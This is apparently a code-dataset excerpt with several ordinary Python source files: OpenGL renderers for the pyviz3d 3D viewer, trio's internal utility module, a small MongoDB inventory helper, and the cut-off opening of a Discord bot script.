5\n ])\n\n def __init__(self,\n model_data: PosesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n def num_elements(self):\n return self.__edge_indices.shape[0]\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.copy(self.__vertex_data).astype(np.float32)\n data[:, :3] *= self.model_data.scale\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.__edge_indices.nbytes, self.__edge_indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None and isinstance(_model_data, PosesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.zeros((1, 3), dtype=np.float32))\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# ScreenModel\nclass ScreenModel(Model):\n \"\"\"A Simple Screen model which allows to display texture a screen\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vao = None\n self.vertex_bo = None\n\n def init_model(self):\n self._is_initialized = True\n self._initialize_buffers()\n\n @staticmethod\n def num_points():\n return 6\n\n def _initialize_buffers(self):\n self.vao = glGenVertexArrays(1)\n self.vertex_bo = glGenBuffers(1)\n\n glBindVertexArray(self.vao)\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n\n data = np.array([\n # First screen triangle\n -1.0, 1.0, 0.0, 1.0,\n -1.0, -1.0, 0.0, 0.0,\n 1.0, -1.0, 1.0, 0.0,\n\n # Second screen triangle\n -1.0, 1.0, 0.0, 1.0,\n 1.0, -1.0, 1.0, 0.0,\n 1.0, 1.0, 1.0, 1.0\n ]).astype(np.float32)\n\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, GL_STATIC_DRAW)\n\n glVertexAttribPointer(self.points_location(),\n 2,\n GL_FLOAT,\n GL_FALSE,\n 4 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n glVertexAttribPointer(self.tex_coords_location(),\n 2,\n GL_FLOAT,\n GL_FALSE,\n 4 * type_size(np.float32),\n ctypes.c_void_p(2 * type_size(np.float32)))\n glEnableVertexAttribArray(self.tex_coords_location())\n\n def update_model(self):\n pass\n\n def delete(self):\n if self.vertex_bo is not None:\n glDeleteBuffers(1, self.vertex_bo)\n if self.vao is not None:\n glDeleteVertexArrays(1, self.vao)\n\n def verify_model_data(self, model_data: Optional[ModelData]):\n return None\n\n # ------------------------------------------------------------------------------------------------------------------\n # OpenGL Shader variables and locations\n @staticmethod\n def points_location():\n return 0\n\n @staticmethod\n def tex_coords_location():\n return 1\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# ELLIPSES\n\n@dataclass\nclass EllipsesModelData(ModelData):\n \"\"\"EllipsesModelData\"\"\"\n ellipses_size: float = 1.0 # The scale factor of the camera model\n covariances: Optional[np.ndarray] = None\n means: Optional[np.ndarray] = None\n colors: Optional[np.ndarray] = None\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass EllipsesModel(Model):\n \"\"\"A Model to render a set of low poly ellipses (80 triangles, 320 points per ellipse)\"\"\"\n\n def __init__(self,\n model_data: EllipsesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n\n # Build the ellipse model\n from viz3d.opengl.primitives.sphere import sphere_model_data\n vertex_and_normals, indices = sphere_model_data()\n\n num_ellipses = self.model_data.means.shape[0]\n num_points = vertex_and_normals.shape[0]\n num_triangles = indices.shape[0]\n\n ellipses_data = vertex_and_normals[:, :3].reshape(1, -1, 3).repeat(num_ellipses, axis=0)\n ellipses_indices = indices.reshape(1, -1, 3).repeat(num_ellipses, axis=0)\n ellipses_indices += (np.arange(num_ellipses) * num_points).reshape(num_ellipses, 1, 1)\n\n # Compute the square root of covariance matrices\n covariances = self.model_data.covariances\n u, s, vt = np.linalg.svd(covariances, hermitian=True)\n s = np.sqrt(s)\n diags = np.eye(3, dtype=np.float32).reshape(1, 3, 3).repeat(num_ellipses, axis=0)\n for i in range(3):\n diags[:, i, i] = s[:, i]\n square_root_covs = u @ diags @ vt\n ellipses_data = np.einsum(\"nij,nmj->nmi\", square_root_covs, ellipses_data)\n\n # Translate ellipse by their means\n ellipses_data += self.model_data.means.reshape(num_ellipses, 1, 3)\n ellipses_color = self.model_data.colors.reshape(num_ellipses, 1, 3).repeat(num_points, axis=1).reshape(-1, 3)\n\n vertex_data = ellipses_data.reshape(num_ellipses * num_points, 3)\n element_indices = ellipses_indices.reshape(num_ellipses * num_triangles * 3).astype(gl_index_np_dtype())\n self._num_elements = element_indices.shape[0]\n\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([self.model_data.ellipses_size * vertex_data,\n ellipses_color],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, element_indices.nbytes, element_indices, self._storage_mode)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert (_model_data is not None and isinstance(_model_data, EllipsesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[1.0, 0.0, 0.0]], dtype=np.float32))\n if _model_data.means is None:\n _model_data.means = np.array([[0.0, 0.0, 0.0]], dtype=np.float32)\n _model_data.covariances = np.eye(3, dtype=np.float32).reshape(1, 3, 3)\n else:\n means = _model_data.means\n check_sizes(means, [-1, 3])\n num_ellipses = means.shape[0]\n\n if _model_data.covariances is None:\n _model_data.covariances = np.eye(3, dtype=np.float32).reshape(1, 3, 3).repeat(num_ellipses, axis=0)\n else:\n covariances = _model_data.covariances\n check_sizes(covariances, [-1, 3, 3])\n diff = np.max(abs(covariances.transpose(0, 2, 1) - covariances))\n assert_debug(diff == 0.0, \"Covariance matrices must be symmetric\")\n\n if _model_data.colors is not None:\n check_sizes(_model_data.colors, [_model_data.means.shape[0], 3])\n _model_data.colors = _model_data.colors.astype(np.float32)\n else:\n _model_data.colors = _model_data.default_color.reshape(1, 3).repeat(_model_data.means.shape[0], axis=0)\n\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# LINES\n@dataclass\nclass LinesModelData(ModelData):\n \"\"\"EllipsesModelData\"\"\"\n line_width: float = 1.0 # The scale factor of the camera model\n line_data: np.ndarray = None\n line_color: np.ndarray = None\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass LinesModel(Model):\n \"\"\"A Model to render a set of colored lines\"\"\"\n\n def __init__(self,\n model_data: LinesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements: int = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Build the line models\n assert isinstance(self.model_data, LinesModelData)\n vertex_data = self.model_data.line_data.reshape(-1, 3)\n color_data = self.model_data.line_color.reshape(-1, 1, 3).repeat(2, axis=1).reshape(-1, 3)\n indices = np.arange(vertex_data.shape[0]).astype(gl_index_np_dtype())\n self._num_elements = indices.shape[0]\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([vertex_data,\n color_data],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert (_model_data is not None and isinstance(_model_data, LinesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[0.0, 1.0, 0.0]], dtype=np.float32))\n\n assert_debug(_model_data.line_data is not None)\n check_sizes(_model_data.line_data, [-1, 2, 3])\n\n _model_data.line_data = _model_data.line_data.astype(np.float32)\n num_lines = _model_data.line_data.shape[0]\n if _model_data.line_color is not None:\n check_sizes(_model_data.line_color, [-1, 3])\n else:\n _model_data.line_color = _model_data.default_color.reshape(1, 1, 3).repeat(num_lines, axis=0)\n\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# VOXELS\n@dataclass\nclass VoxelsModelData(ModelData):\n \"\"\"VoxelsModelData\"\"\"\n voxel_points: np.ndarray = None\n voxel_size: float = 1.0\n line_width: float = 1.0\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass VoxelsModel(Model):\n \"\"\"A Model to render a set of cameras displayed as a simple edge pyramid\"\"\"\n\n __voxel_model = 0.5 * farray([\n 1., 1., 1.,\n 1., 1., -1.,\n 1., -1., 1.,\n 1., -1., -1.,\n -1., 1., 1.,\n -1., 1., -1.,\n -1., -1., 1.,\n -1., -1., -1.,\n ])\n\n __voxel_element_indices = idarray([\n 0, 1,\n 0, 2,\n 0, 4,\n\n 3, 1,\n 3, 2,\n 3, 7,\n\n 6, 7,\n 6, 4,\n 6, 2,\n\n 5, 4,\n 5, 7,\n 5, 1\n ])\n\n def __init__(self,\n model_data: VoxelsModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements: int = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Build the line models\n assert isinstance(self.model_data, VoxelsModelData)\n\n voxel_centers = (np.round(self.model_data.voxel_points / \\\n self.model_data.voxel_size)) * self.model_data.voxel_size\n\n voxel_centers = np.unique(voxel_centers, axis=0)\n num_points = voxel_centers.shape[0]\n\n voxel_vertices = self.model_data.voxel_size * self.__voxel_model.reshape(1, -1, 3).repeat(num_points, axis=0)\n num_model_points = self.__voxel_model.shape[0]\n\n voxel_edge_indices = self.__voxel_element_indices.reshape(1, -1, 2).repeat(num_points, axis=0)\n for i in range(num_points):\n voxel_edge_indices[i] += num_model_points * i\n voxel_vertices += voxel_centers.reshape(num_points, 1, 3)\n\n voxel_vertices = voxel_vertices.reshape(-1, 3)\n voxel_edge_indices = voxel_edge_indices.reshape(-1)\n color_data = self.model_data.default_color.reshape(1, 3).repeat(voxel_vertices.shape[0], axis=0)\n\n self._num_elements = voxel_edge_indices.shape[0]\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([voxel_vertices,\n color_data],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, voxel_edge_indices.nbytes, voxel_edge_indices, GL_DYNAMIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert _model_data is not None\n assert isinstance(_model_data, VoxelsModelData)\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[0.0, 1.0, 0.0]], dtype=np.float32))\n\n assert_debug(_model_data.voxel_points is not None)\n check_sizes(_model_data.voxel_points, [-1, 3])\n _model_data.voxel_points = _model_data.voxel_points.astype(np.float32)\n\n return _model_data\n","repo_name":"pierdell/pyviz3d","sub_path":"viz3d/opengl/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":35003,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"27687746635","text":"# coding: utf-8\n\n# Little utilities we use internally\n\nfrom abc import ABCMeta\nimport os\nimport signal\nimport sys\nimport pathlib\nfrom functools import wraps, update_wrapper\nimport typing as t\nimport threading\nimport collections\n\nfrom async_generator import isasyncgen\n\nimport trio\n\n# Equivalent to the C function raise(), which Python doesn't wrap\nif os.name == \"nt\":\n # On windows, os.kill exists but is really weird.\n #\n # If you give it CTRL_C_EVENT or CTRL_BREAK_EVENT, it tries to deliver\n # those using GenerateConsoleCtrlEvent. But I found that when I tried\n # to run my test normally, it would freeze waiting... unless I added\n # print statements, in which case the test suddenly worked. So I guess\n # these signals are only delivered if/when you access the console? I\n # don't really know what was going on there. From reading the\n # GenerateConsoleCtrlEvent docs I don't know how it worked at all.\n #\n # I later spent a bunch of time trying to make GenerateConsoleCtrlEvent\n # work for creating synthetic control-C events, and... failed\n # utterly. There are lots of details in the code and comments\n # removed/added at this commit:\n # https://github.com/python-trio/trio/commit/95843654173e3e826c34d70a90b369ba6edf2c23\n #\n # OTOH, if you pass os.kill any *other* signal number... then CPython\n # just calls TerminateProcess (wtf).\n #\n # So, anyway, os.kill is not so useful for testing purposes. Instead\n # we use raise():\n #\n # https://msdn.microsoft.com/en-us/library/dwwzkt4c.aspx\n #\n # Have to import cffi inside the 'if os.name' block because we don't\n # depend on cffi on non-Windows platforms. (It would be easy to switch\n # this to ctypes though if we ever remove the cffi dependency.)\n #\n # Some more information:\n # https://bugs.python.org/issue26350\n #\n # Anyway, we use this for two things:\n # - redelivering unhandled signals\n # - generating synthetic signals for tests\n # and for both of those purposes, 'raise' works fine.\n import cffi\n\n _ffi = cffi.FFI()\n _ffi.cdef(\"int raise(int);\")\n _lib = _ffi.dlopen(\"api-ms-win-crt-runtime-l1-1-0.dll\")\n signal_raise = getattr(_lib, \"raise\")\nelse:\n\n def signal_raise(signum):\n signal.pthread_kill(threading.get_ident(), signum)\n\n\n# See: #461 as to why this is needed.\n# The gist is that threading.main_thread() has the capability to lie to us\n# if somebody else edits the threading ident cache to replace the main\n# thread; causing threading.current_thread() to return a _DummyThread,\n# causing the C-c check to fail, and so on.\n# Trying to use signal out of the main thread will fail, so we can then\n# reliably check if this is the main thread without relying on a\n# potentially modified threading.\ndef is_main_thread():\n \"\"\"Attempt to reliably check if we are in the main thread.\"\"\"\n try:\n signal.signal(signal.SIGINT, signal.getsignal(signal.SIGINT))\n return True\n except ValueError:\n return False\n\n\n######\n# Call the function and get the coroutine object, while giving helpful\n# errors for common mistakes. Returns coroutine object.\n######\ndef coroutine_or_error(async_fn, *args):\n def _return_value_looks_like_wrong_library(value):\n # Returned by legacy @asyncio.coroutine functions, which includes\n # a surprising proportion of asyncio builtins.\n if isinstance(value, collections.abc.Generator):\n return True\n # The protocol for detecting an asyncio Future-like object\n if getattr(value, \"_asyncio_future_blocking\", None) is not None:\n return True\n # This janky check catches tornado Futures and twisted Deferreds.\n # By the time we're calling this function, we already know\n # something has gone wrong, so a heuristic is pretty safe.\n if value.__class__.__name__ in (\"Future\", \"Deferred\"):\n return True\n return False\n\n try:\n coro = async_fn(*args)\n\n except TypeError:\n # Give good error for: nursery.start_soon(trio.sleep(1))\n if isinstance(async_fn, collections.abc.Coroutine):\n # explicitly close coroutine to avoid RuntimeWarning\n async_fn.close()\n\n raise TypeError(\n \"Trio was expecting an async function, but instead it got \"\n \"a coroutine object {async_fn!r}\\n\"\n \"\\n\"\n \"Probably you did something like:\\n\"\n \"\\n\"\n \" trio.run({async_fn.__name__}(...)) # incorrect!\\n\"\n \" nursery.start_soon({async_fn.__name__}(...)) # incorrect!\\n\"\n \"\\n\"\n \"Instead, you want (notice the parentheses!):\\n\"\n \"\\n\"\n \" trio.run({async_fn.__name__}, ...) # correct!\\n\"\n \" nursery.start_soon({async_fn.__name__}, ...) # correct!\".format(\n async_fn=async_fn\n )\n ) from None\n\n # Give good error for: nursery.start_soon(future)\n if _return_value_looks_like_wrong_library(async_fn):\n raise TypeError(\n \"Trio was expecting an async function, but instead it got \"\n \"{!r} – are you trying to use a library written for \"\n \"asyncio/twisted/tornado or similar? That won't work \"\n \"without some sort of compatibility shim.\".format(async_fn)\n ) from None\n\n raise\n\n # We can't check iscoroutinefunction(async_fn), because that will fail\n # for things like functools.partial objects wrapping an async\n # function. So we have to just call it and then check whether the\n # return value is a coroutine object.\n if not isinstance(coro, collections.abc.Coroutine):\n # Give good error for: nursery.start_soon(func_returning_future)\n if _return_value_looks_like_wrong_library(coro):\n raise TypeError(\n \"Trio got unexpected {!r} – are you trying to use a \"\n \"library written for asyncio/twisted/tornado or similar? \"\n \"That won't work without some sort of compatibility shim.\".format(coro)\n )\n\n if isasyncgen(coro):\n raise TypeError(\n \"start_soon expected an async function but got an async \"\n \"generator {!r}\".format(coro)\n )\n\n # Give good error for: nursery.start_soon(some_sync_fn)\n raise TypeError(\n \"Trio expected an async function, but {!r} appears to be \"\n \"synchronous\".format(getattr(async_fn, \"__qualname__\", async_fn))\n )\n\n return coro\n\n\nclass ConflictDetector:\n \"\"\"Detect when two tasks are about to perform operations that would\n conflict.\n\n Use as a synchronous context manager; if two tasks enter it at the same\n time then the second one raises an error. You can use it when there are\n two pieces of code that *would* collide and need a lock if they ever were\n called at the same time, but that should never happen.\n\n We use this in particular for things like, making sure that two different\n tasks don't call sendall simultaneously on the same stream.\n\n \"\"\"\n\n def __init__(self, msg):\n self._msg = msg\n self._held = False\n\n def __enter__(self):\n if self._held:\n raise trio.BusyResourceError(self._msg)\n else:\n self._held = True\n\n def __exit__(self, *args):\n self._held = False\n\n\ndef async_wraps(cls, wrapped_cls, attr_name):\n \"\"\"Similar to wraps, but for async wrappers of non-async functions.\"\"\"\n\n def decorator(func):\n func.__name__ = attr_name\n func.__qualname__ = \".\".join((cls.__qualname__, attr_name))\n\n func.__doc__ = \"\"\"Like :meth:`~{}.{}.{}`, but async.\n\n \"\"\".format(\n wrapped_cls.__module__, wrapped_cls.__qualname__, attr_name\n )\n\n return func\n\n return decorator\n\n\ndef fixup_module_metadata(module_name, namespace):\n seen_ids = set()\n\n def fix_one(qualname, name, obj):\n # avoid infinite recursion (relevant when using\n # typing.Generic, for example)\n if id(obj) in seen_ids:\n return\n seen_ids.add(id(obj))\n\n mod = getattr(obj, \"__module__\", None)\n if mod is not None and mod.startswith(\"trio.\"):\n obj.__module__ = module_name\n # Modules, unlike everything else in Python, put fully-qualitied\n # names into their __name__ attribute. We check for \".\" to avoid\n # rewriting these.\n if hasattr(obj, \"__name__\") and \".\" not in obj.__name__:\n obj.__name__ = name\n obj.__qualname__ = qualname\n if isinstance(obj, type):\n for attr_name, attr_value in obj.__dict__.items():\n fix_one(objname + \".\" + attr_name, attr_name, attr_value)\n\n for objname, obj in namespace.items():\n if not objname.startswith(\"_\"): # ignore private attributes\n fix_one(objname, objname, obj)\n\n\nclass generic_function:\n \"\"\"Decorator that makes a function indexable, to communicate\n non-inferrable generic type parameters to a static type checker.\n\n If you write::\n\n @generic_function\n def open_memory_channel(max_buffer_size: int) -> Tuple[\n SendChannel[T], ReceiveChannel[T]\n ]: ...\n\n it is valid at runtime to say ``open_memory_channel[bytes](5)``.\n This behaves identically to ``open_memory_channel(5)`` at runtime,\n and currently won't type-check without a mypy plugin or clever stubs,\n but at least it becomes possible to write those.\n \"\"\"\n\n def __init__(self, fn):\n update_wrapper(self, fn)\n self._fn = fn\n\n def __call__(self, *args, **kwargs):\n return self._fn(*args, **kwargs)\n\n def __getitem__(self, _):\n return self\n\n\nclass Final(ABCMeta):\n \"\"\"Metaclass that enforces a class to be final (i.e., subclass not allowed).\n\n If a class uses this metaclass like this::\n\n class SomeClass(metaclass=Final):\n pass\n\n The metaclass will ensure that no sub class can be created.\n\n Raises\n ------\n - TypeError if a sub class is created\n \"\"\"\n\n def __new__(cls, name, bases, cls_namespace):\n for base in bases:\n if isinstance(base, Final):\n raise TypeError(\n f\"{base.__module__}.{base.__qualname__} does not support subclassing\"\n )\n return super().__new__(cls, name, bases, cls_namespace)\n\n\nT = t.TypeVar(\"T\")\n\n\nclass NoPublicConstructor(Final):\n \"\"\"Metaclass that enforces a class to be final (i.e., subclass not allowed)\n and ensures a private constructor.\n\n If a class uses this metaclass like this::\n\n class SomeClass(metaclass=NoPublicConstructor):\n pass\n\n The metaclass will ensure that no sub class can be created, and that no instance\n can be initialized.\n\n If you try to instantiate your class (SomeClass()), a TypeError will be thrown.\n\n Raises\n ------\n - TypeError if a sub class or an instance is created.\n \"\"\"\n\n def __call__(cls, *args, **kwargs):\n raise TypeError(\n f\"{cls.__module__}.{cls.__qualname__} has no public constructor\"\n )\n\n def _create(cls: t.Type[T], *args: t.Any, **kwargs: t.Any) -> T:\n return super().__call__(*args, **kwargs) # type: ignore\n\n\ndef name_asyncgen(agen):\n \"\"\"Return the fully-qualified name of the async generator function\n that produced the async generator iterator *agen*.\n \"\"\"\n if not hasattr(agen, \"ag_code\"): # pragma: no cover\n return repr(agen)\n try:\n module = agen.ag_frame.f_globals[\"__name__\"]\n except (AttributeError, KeyError):\n module = \"<{}>\".format(agen.ag_code.co_filename)\n try:\n qualname = agen.__qualname__\n except AttributeError:\n qualname = agen.ag_code.co_name\n return f\"{module}.{qualname}\"\n","repo_name":"cwyrwas/ChatGPT-Content-Generator","sub_path":".venv/Lib/site-packages/trio/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":11997,"program_lang":"python","lang":"en","doc_type":"code","stars":126,"dataset":"github-code","pt":"61"} +{"seq_id":"33618402959","text":"#dbTools\n#Database and data handling logic module for inventoryApp\n\nimport pymongo\nimport modules.config as config\n\nclient = pymongo.MongoClient(config.dbString)\ndb = client[config.dbName]\nstacks = db['stacks']\nlocations = db['locations']\nitems = db['items']\n\n\nclass stack:\n\n def __init__(self, part, qty, batch, expiration, unit, location):\n self.partNumber=part #string\n self.qty = qty #float\n self.batch = batch #string\n self.expiration = expiration #datetime or zero for non expiring\n self.unit = unit #string\n self.location = location #string\n\n def updateQty(self, amount):\n self.qty += amount\n \n def pushStackRecord(self, coll):\n print(\"creating stack record....\")\n rec = {\n 'partNumber': self.partNumber,\n 'qty': self.qty,\n 'unit': self.unit,\n 'batch': self.batch,\n 'expiration': self.expiration,\n 'location' : self.location\n }\n print(\"Pushing stack record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\nclass item:\n def __init__(self, partNum, description, expiration, unit):\n self.partNum = partNum #string\n self.description = description #string\n self.expiration = expiration #datetime or zero for non expiring\n self.unit = unit #string\n\n def pushItemRecord(self, coll):\n print(\"creating item record....\")\n rec = {\n 'partNumber': self.partNum,\n 'description': self.description,\n 'expiration' : self.expiration,\n 'unit' : self.unit\n }\n print(\"Pushing item record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\nclass location:\n def __init__(self, locationName, storageType, warehouse):\n self.locationName = locationName\n self.storageType = storageType\n self.warehouse = warehouse\n\n def pushLocationRecord(self, coll):\n print(\"Creating location record....\")\n rec = {\n 'locationName':self.locationName,\n 'storageType':self.storageType,\n 'warehouse':self.warehouse\n }\n print(\"Pushing location record....\")\n x = coll.insert_one(rec)\n print(\"Push Complete....\")\n\ndef getStockList(query):\n if query == None:\n res = list(stacks.find())\n else:\n res = list(stacks.find({\"$or\":[{\"partNumber\": query}, {\"batch\": query}, {\"location\": query}]}))\n \n return res\n\ndef getItemList(query):\n if query == None:\n res = list(items.find())\n else:\n res = list(items.find({\"$or\":[{\"partNumber\": query}, {\"description\": query}]}))\n \n return res\n\ndef getLocationList(query):\n if query == None:\n res = list(locations.find())\n else:\n res = list(locations.find({\"locName\": query}))\n \n return res\n\ndef itemExists(query):\n res = list(items.find({'partNumber': query}))\n if len(res) > 0:\n return True\n else:\n return False\n\ndef locationExists(query):\n res = list(locations.find({'locationName': query}))\n if len(res) > 0:\n return True\n else:\n return False","repo_name":"jqa7288/inventoryProject","sub_path":"app/modules/dbTools.py","file_name":"dbTools.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3932757445","text":"import asyncio\nfrom http import client\nimport http.client\nimport json\nimport logging\nimport os\nimport platform\nimport random\nimport sys\n\nimport aiosqlite\nimport discord\nfrom discord.ext import commands, tasks\nfrom discord.ext.commands import Bot, Context\nfrom datetime import datetime\nfrom urllib.request import Request, urlopen\n\nimport json\n\nimport exceptions\n\nif not os.path.isfile(f\"{os.path.realpath(os.path.dirname(__file__))}/config.json\"):\n sys.exit(\"'config.json' not found! Please add it and try again.\")\nelse:\n with 